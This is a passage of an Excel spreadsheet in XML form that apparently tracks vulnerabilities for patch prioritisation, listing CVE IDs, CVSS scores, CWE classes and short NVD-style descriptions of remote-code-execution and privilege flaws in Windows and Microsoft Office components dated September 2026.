        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69434</t>
        </is>
      </c>
      <c r="C862" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E862" s="5" t="inlineStr"/>
      <c r="F862" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G862" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H862" s="5" t="inlineStr"/>
      <c r="I862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L862" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="C863" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E863" s="5" t="inlineStr"/>
      <c r="F863" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G863" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H863" s="5" t="inlineStr"/>
      <c r="I863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L863" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69442</t>
        </is>
      </c>
      <c r="C864" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E864" s="5" t="inlineStr"/>
      <c r="F864" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G864" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H864" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I864" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L864" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="C865" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E865" s="5" t="inlineStr"/>
      <c r="F865" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G865" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H865" s="5" t="inlineStr"/>
      <c r="I865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L865" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="C866" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E866" s="5" t="inlineStr"/>
      <c r="F866" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G866" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H866" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L866" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="C867" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E867" s="5" t="inlineStr"/>
      <c r="F867" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G867" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H867" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I867" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L867" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69485</t>
        </is>
      </c>
      <c r="C868" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E868" s="5" t="inlineStr"/>
      <c r="F868" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="inlineStr"/>
      <c r="I868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L868" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69494</t>
        </is>
      </c>
      <c r="C869" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E869" s="5" t="inlineStr"/>
      <c r="F869" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G869" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H869" s="5" t="inlineStr"/>
      <c r="I869" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L869" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69495</t>
        </is>
      </c>
      <c r="C870" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E870" s="5" t="inlineStr"/>
      <c r="F870" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G870" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H870" s="5" t="inlineStr"/>
      <c r="I870" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J870" s="5" t="inlineStr"/>
      <c r="K870" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L870" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69499</t>
        </is>
      </c>
      <c r="C871" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E871" s="5" t="inlineStr"/>
      <c r="F871" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G871" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H871" s="5" t="inlineStr"/>
      <c r="I871" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L871" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69511</t>
        </is>
      </c>
      <c r="C872" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E872" s="5" t="inlineStr"/>
      <c r="F872" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G872" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H872" s="5" t="inlineStr"/>
      <c r="I872" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L872" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="C873" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E873" s="5" t="inlineStr"/>
      <c r="F873" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G873" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H873" s="5" t="inlineStr"/>
      <c r="I873" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L873" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="C874" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E874" s="5" t="inlineStr"/>
      <c r="F874" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="inlineStr"/>
      <c r="I874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L874" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69529</t>
        </is>
      </c>
      <c r="C875" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E875" s="5" t="inlineStr"/>
      <c r="F875" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G875" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H875" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L875" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69547</t>
        </is>
      </c>
      <c r="C876" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E876" s="5" t="inlineStr"/>
      <c r="F876" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G876" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H876" s="5" t="inlineStr"/>
      <c r="I876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L876" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69551</t>
        </is>
      </c>
      <c r="C877" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E877" s="5" t="inlineStr"/>
      <c r="F877" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G877" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H877" s="5" t="inlineStr"/>
      <c r="I877" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L877" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69556</t>
        </is>
      </c>
      <c r="C878" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E878" s="5" t="inlineStr"/>
      <c r="F878" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G878" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H878" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L878" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69598</t>
        </is>
      </c>
      <c r="C879" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E879" s="5" t="inlineStr"/>
      <c r="F879" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G879" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H879" s="5" t="inlineStr"/>
      <c r="I879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L879" s="5" t="inlineStr">
        <is>
          <t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69601</t>
        </is>
      </c>
      <c r="C880" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E880" s="5" t="inlineStr"/>
      <c r="F880" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G880" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H880" s="5" t="inlineStr"/>
      <c r="I880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L880" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69603</t>
        </is>
      </c>
      <c r="C881" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E881" s="5" t="inlineStr"/>
      <c r="F881" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G881" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H881" s="5" t="inlineStr"/>
      <c r="I881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J881" s="5" t="inlineStr"/>
      <c r="K881" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L881" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69614</t>
        </is>
      </c>
      <c r="C882" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E882" s="5" t="inlineStr"/>
      <c r="F882" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G882" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H882" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I882" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-20</t>
        </is>
      </c>
      <c r="L882" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69628</t>
        </is>
      </c>
      <c r="C883" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E883" s="5" t="inlineStr"/>
      <c r="F883" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G883" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H883" s="5" t="inlineStr"/>
      <c r="I883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L883" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69629</t>
        </is>
      </c>
      <c r="C884" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E884" s="5" t="inlineStr"/>
      <c r="F884" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G884" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H884" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L884" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69632</t>
        </is>
      </c>
      <c r="C885" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E885" s="5" t="inlineStr"/>
      <c r="F885" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G885" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H885" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L885" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t>
        </is>
      </c>
    </row>
